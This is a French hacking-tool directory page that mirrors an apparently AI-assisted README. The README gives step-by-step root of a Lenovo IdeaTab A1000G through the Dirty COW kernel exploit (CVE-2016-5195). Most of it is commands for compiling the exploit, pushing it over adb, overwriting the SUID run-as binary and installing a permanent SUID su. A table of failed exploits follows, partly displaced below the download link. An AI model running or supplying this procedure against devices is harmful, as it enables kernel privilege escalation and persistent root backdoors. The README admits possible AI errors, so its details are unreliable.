Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/voidgguy/lenovo-a1000g-mt8317-a412_01_09_130907-kernel-3.4.0-root-cve-2016-5195
Sécurité AndroidEscalade de PrivilègesMécanismes de PersistanceExploitationPost-ExploitationSécurité MobileExploitation de Binaires
GitHubvoidgguy/lenovo-a1000g-mt8317-a412_01_09_130907-kernel-3.4.0-root-cve-2016-5195

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

lenovo-a1000g-mt8317-A412_01_09_130907-kernel-3.4.0-root-cve-2016-5195

[Assisté par IA] Méthode de root pour Lenovo IdeaTab A1000G (MT8317, kernel 3.4.0, Android 4.1) via CVE-2016-5195 (Dirty COW)

Voir le dépôt
7il y a 2 moisPas encore vérifié

Lenovo IdeaTab A1000G — Root

Remarque : Cette documentation et le code d'exploit ont été générés avec l'aide de l'IA (Kiro). Vérifiez avant utilisation — l'IA peut faire des erreurs et en fait.

Appareil

ChampValeur
ModèleLenovo IdeaTab A1000G
SoCMediaTek MT8317 (= MT6517)
CPUDual-core Cortex-A9 @ 1.2GHz
NoyauLinux 3.4.0
BuildA1000G_A412_01_09_130907_2G
Android4.1.2 (Jelly Bean)

Prérequis

  • Débogage USB activé
  • ADB connecté
  • Android NDK r28+ dans ~/Android/Sdk/ndk/
  • Binaire statique busybox-armv7l (busybox.net/downloads/binaries/1.21.1/)

Exploit — CVE-2016-5195 (Dirty COW)

Course critique dans le chemin mmap/write du noyau. Concerne les noyaux 2.6.22–4.8.3. Cible : /system/bin/run-as (SUID root, 9448 octets).

1. Compiler

root@kitploit:~
NDK=~/Android/Sdk/ndk/28.2.13676358/toolchains/llvm/prebuilt/linux-x86_64/bin
CC=$NDK/armv7a-linux-androideabi21-clang

# dcow exploit
$CC -o dcow -static -march=armv7-a -mfloat-abi=softfp -O1 \
    -UPRINT -UDEBUG "-DLOGV(...)=printf(__VA_ARGS__)" \
    dcow_main.c dirtycow_android.c

# su binary
$CC -o su -march=armv7-a -mfloat-abi=softfp -Os -s -fno-pie -no-pie su2_src.c

2. Compléter su jusqu'à la taille cible (9448 octets)

root@kitploit:~
with open('su', 'rb') as f: data = f.read()
data = data + b'\x00' * (9448 - len(data))
with open('su_padded', 'wb') as f: f.write(data)

3. Exécuter

root@kitploit:~
adb push dcow su_padded su /data/local/tmp/
adb shell chmod 755 /data/local/tmp/dcow /data/local/tmp/su_padded /data/local/tmp/su
adb shell "/data/local/tmp/dcow /data/local/tmp/su_padded /system/bin/run-as"
# Wait for: [+] Success!

4. Installer su définitivement

root@kitploit:~
# Enter root shell first
adb shell /system/bin/run-as

# Then:
mount -o remount,rw /system
toolbox dd if=/data/local/tmp/su of=/system/bin/su
toolbox chmod 6755 /system/bin/su
toolbox chown root:root /system/bin/su

5. Installer busybox (facultatif)

root@kitploit:~
# From PC:
adb push busybox-armv7l /data/local/tmp/busybox

# From root shell:
toolbox dd if=/data/local/tmp/busybox of=/system/bin/busybox
toolbox chmod 755 /system/bin/busybox
/system/bin/busybox --install /system/bin/

Utilisation

root@kitploit:~
adb shell
/system/bin/run-as   # drops to root shell (#)
id                   # uid=0(root)

adb shell /system/bin/su -c cmd ne fonctionne PAS — ADB retire le setuid. Il faut d'abord ouvrir un shell interactif.

Après le Root

  • /system/bin/run-as → écrasé (la fonctionnalité run-as d'origine est cassée)
  • /system/bin/su → binaire su SUID permanent
  • /system/bin/busybox → busybox 1.21.1

Tentatives échouées

MéthodeRaison
CVE-2013-1763 sock_diagNon compilé dans le noyau

Fichiers

root@kitploit:~
.
├── README.md
├── root.sh              # automated root script
├── dirtycow_android.c   # CVE-2016-5195 core (Arinerron fork)
├── dcow_main.c          # main() wrapper
└── su2_src.c            # su binary source

Binaires précompilés non inclus — compilez à partir de la source en suivant les étapes ci-dessus.

Références

  • Source CVE-2016-5195 : Arinerron/CVE-2016-5195
  • ROM du firmware (build différent, utilisée uniquement pour l'extraction des symboles du noyau) : Lenovo_A1000G_MT6577_01_24_130329 — les symboles de cette ROM fonctionnent sur le build A412_01_09_130907 car les deux partagent la même disposition virtuelle du noyau
Télécharger l’outil
CVE-2013-6282 get_user/put_userldrt/strt bloqués sur Cortex-A9
CVE-2014-3153 TowelrootPanique noyau — décalage iovstack de sendmmsg incorrect pour MTK
Framaroot AdbActivityNullPointerException, incompatible
/proc/self/mem overwriteAdresses noyau inaccessibles depuis l'espace utilisateur